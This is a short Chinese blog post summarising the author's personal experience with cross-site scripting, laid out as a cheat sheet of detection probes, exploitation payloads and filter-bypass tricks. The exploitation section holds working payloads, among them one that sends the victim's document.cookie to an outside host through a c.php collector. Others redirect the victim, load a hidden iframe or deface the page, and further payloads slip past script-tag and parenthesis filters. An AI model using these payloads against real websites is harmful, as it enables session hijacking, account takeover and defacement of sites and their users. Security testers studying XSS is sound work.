web安全

xss个人经验总结

2018-06-07  本文已影响49人  shadowflow

1,利用xss跳转网页 alert(window.location.href='http://www.sjtu.edu.cn')
2,弹出cookie alert(document.cookie)
2,可以试着对xss poc代码进行url编码再利用
3,闭合相应的标签;可以试着用“+”替代空格
4,cookie中有&等字符会分割cookie以至于打不到完整cookie这时可以用 escape(document.cookie)

经典POC

检测:
<script>alert('xss')</script>
<a href='' onclick=alert('xss')>type</a>
<img src=http://192.168.1.1/a.jpg onerror=alert('xss')>
利用:
<script>window.location='http://1.1.1.1'</script>
<iframe SRC="http://1.1.1.1/victim" height="0" width="0"></iframe>
<script>new Image().src="http://192.168.1.102/c.php?output="+document.cookie;</script>
<script>document.body.innerHTML=''<div style=visibility:visible;><h1>THIS WEBSITE IS UNDER ATTACK</h1></div>";</script>

绕过方法:

1. 过滤了script标签 :

payload:<input/onclick=alert(111)>

2. hidden下隐藏表单触发事件弹窗

<input type=hidden value==11 accesskey="h" onclick=alert(111)>

firefox下按 shift+alt+h 触发
3. script隐藏绕过弹窗

<script src="data:,alert(111)"></SCRIPT>

4. 小括号过滤绕过弹窗

<img src=111111 onerror=alert&lpar;2&rpar;>

5. 闭合url跳转,绕过alert检测

www.baidu.com";prompt(111);//
上一篇 下一篇

猜你喜欢

热点阅读